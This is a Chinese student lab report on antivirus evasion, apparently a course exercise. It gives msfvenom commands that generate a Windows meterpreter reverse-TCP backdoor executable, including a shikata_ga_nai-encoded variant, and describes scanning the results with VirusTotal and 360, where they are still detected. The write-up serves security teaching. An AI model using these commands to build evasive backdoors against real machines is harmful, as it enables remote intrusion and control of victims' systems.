其他分享
首页 > 其他分享> > Exp3-免杀原理

Exp3-免杀原理

作者:互联网

20191218 Exp3-免杀原理

实验过程

一、正确使用msf编码器、msfvenom生成如jar之类的其他文件

免杀检测

  1. 参考实验二Exp2-后门原理与实践中的第三个小实验,在Kali上用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe生成针对Windows的毒化后门可执行程序20191218_backdoor.exe
  2. 放入VirusTotal和360安全卫士中进行扫描
  1. 使用msf编码器多次迭代,生成exe文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218exp3.exe


用VirusTotal检测还是能检测出问题

加入多次编码参数-i,继续尝试

放入360查杀还是会检测出病毒

以上步骤说明简单的多次编码无法实现免杀

生成php格式的后门文件

man msfvenom查找msf毒化命令的使用说明

使用如下命令生成php格式的后门文件


标签:后门,编码,exe,免杀,Exp3,检测,msfvenom,原理
来源: https://www.cnblogs.com/20191218tangqiheng/p/16093201.html